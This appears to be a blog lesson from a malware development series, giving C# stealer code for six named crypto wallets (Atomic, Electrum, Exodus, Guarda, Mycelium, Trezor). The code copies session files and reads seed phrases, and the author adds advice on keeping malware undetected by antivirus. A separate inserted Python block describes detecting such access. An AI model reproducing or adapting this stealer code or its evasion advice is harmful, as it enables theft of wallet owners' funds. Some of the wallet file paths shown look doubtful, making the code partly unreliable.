Lesson 9: Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes

👾 Malware Development Series by XIT (C#)

XIT
5 min read · Apr 4, 2023


Below is the Topics List for Lesson 9:

9. Offline Crypto Wallets:
⇢ Atomic
⇢ Electrum
⇢ Exodus
more… (Guarda, Mycelium, Trezor)

Cryptocurrencies are becoming increasingly popular, with a rising number of people storing their digital assets in physical crypto wallets. These wallets, however, are excellent targets for attackers looking to steal bitcoin or other coins. In this lesson, we’ll demonstrate how to add functionality that can steal offline crypto wallets from popular services such as Atomic, Electrum, Exodus, and three more popular wallets.

Topic 1: Atomic Wallet

Atomic Wallet is a well-known offline cryptocurrency wallet that supports over 500 different coins. Using the below source-code you can write a function that is capable of stealing Atomic Wallet passwords and gaining access to users’ crypto assets.

// atomic
// set the folder path to save session files and mnemonic phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "atomic", "Local Storage", "leveldb");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "LOCK*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the mnemonic phrase
string mnemonicPath = Path.Combine(walletPath, "mnemonic.json");
string mnemonicJson = File.ReadAllText(mnemonicPath);
dynamic mnemonic = Newtonsoft.Json.JsonConvert.DeserializeObject(mnemonicJson);
string mnemonicPhrase = mnemonic.mnemonic;

// save the mnemonic phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "mnemonic.txt"), mnemonicPhrase);

Topic 2: Electrum Wallet

Electrum is another well-known offline crypto wallet that has been in existence since 2011. Using the below source-code you can write a function that can steal Electrum Wallet passwords and access users’ crypto assets.

// electrum
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "electrum.lock");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "wallet_seed");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 3: Exodus Wallet

Exodus is an easy-to-use offline crypto wallet that supports over 100 cryptocurrencies. Using the below source-code you can write a function that can steal Exodus Wallet credentials and give you access to users’ digital assets.

// exodus 
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Exodus");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "exodus.wallet");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.encseed;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 4: Other Crypto Wallets

There are numerous additional offline crypto wallets with significant credentials besides Atomic, Electrum, and Exodus. Using the below source-codes you can write a function that can steal passwords from other popular cryptocurrency wallets, allowing you to access even more digital assets.

A) Guarda

// guarda
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Guarda");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "mnemonic.key");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.mnemonic_phrase;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

B) Mycelium

// mycelium
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Personal), "Mycelium", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "keys", "masterseed");
byte[] seedBytes = File.ReadAllBytes(seedPath);
string seedPhrase = Encoding.UTF8.GetString(seedBytes);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

C) Trezor

// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "trezor", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "seed.txt");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);
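
Seen from the defender's side, every snippet above has the same shape: a process that is not the wallet application reads files under that wallet's data directory. The following is an added detection example, not code from the original article. It assumes file-system auditing (a SACL) is enabled on these directories so that Windows Security event 4663 records exist; the owning process names and the sample events are constructed assumptions.

```python
import ntpath
from collections import defaultdict

# Data directories named on this page (relative to the user profile), mapped to
# the process assumed to own them. The process names are assumptions.
WALLET_DIRS = {
    r"appdata\local\atomic\local storage\leveldb": "atomic wallet.exe",
    r"appdata\roaming\electrum": "electrum.exe",
    r"appdata\roaming\exodus": "exodus.exe",
    r"appdata\roaming\guarda": "guarda.exe",
    r"documents\mycelium\wallets": "mycelium.exe",
    r"appdata\local\trezor\wallets": "trezor suite.exe",
}

# Constructed sample records using field names from Security event 4663.
SAMPLE_EVENTS = [
    {"SubjectUserName": "alice", "ProcessName": r"C:\Program Files\Exodus\Exodus.exe",
     "ObjectName": r"C:\Users\alice\AppData\Roaming\Exodus\exodus.wallet"},
    {"SubjectUserName": "alice", "ProcessName": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ObjectName": r"C:\Users\alice\AppData\Roaming\Exodus\session1"},
    {"SubjectUserName": "alice", "ProcessName": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ObjectName": r"C:\Users\alice\AppData\Roaming\Electrum\wallet_seed"},
    {"SubjectUserName": "alice", "ProcessName": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ObjectName": r"C:\Users\alice\Documents\notes.txt"},
    {"SubjectUserName": "bob", "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ObjectName": r"C:\Users\bob\AppData\Local\atomic\Local Storage\leveldb\LOCK"},
]

def wallet_dir_for(object_name):
    """Return the watched wallet directory that contains object_name, else None."""
    path = object_name.lower() + "\\"
    return next((d for d in WALLET_DIRS if "\\" + d + "\\" in path), None)

def detect(events):
    """Alert on wallet-data access by any process other than the owning wallet app."""
    hits = defaultdict(set)  # (user, process path) -> wallet directories touched
    for ev in events:
        wdir = wallet_dir_for(ev["ObjectName"])
        image = ntpath.basename(ev["ProcessName"]).lower()
        if wdir and image != WALLET_DIRS[wdir]:
            hits[(ev["SubjectUserName"], ev["ProcessName"])].add(wdir)
    return [{"user": u, "process": p, "wallet_dirs": sorted(d),
             "severity": "high" if len(d) > 1 else "medium"}
            for (u, p), d in sorted(hits.items())]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

One process touching several wallet directories is rated high because no legitimate wallet does that; backup and antivirus tools will surface as medium and need an allow-list.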

Finally, I compiled all the topics of lesson 9 & it was detected by 3 out of 26 antivirus scans.

Remember: Don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those listed in the article given below to keep your malware undetected forever:

https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

For attackers looking to steal important digital assets, stealing offline crypto wallets is a profitable technique. This class explained how to create malware that may be used to steal login information from well-known offline cryptocurrency wallets like Atomic, Electrum, and Exodus. With this information, you may create malware programmes that are more effective and keep up with the most recent cybersecurity threats. Keep an eye out for our upcoming class, where we’ll discuss creating functions that can capture account sessions.

A supporter is worth a thousand followers. 😊
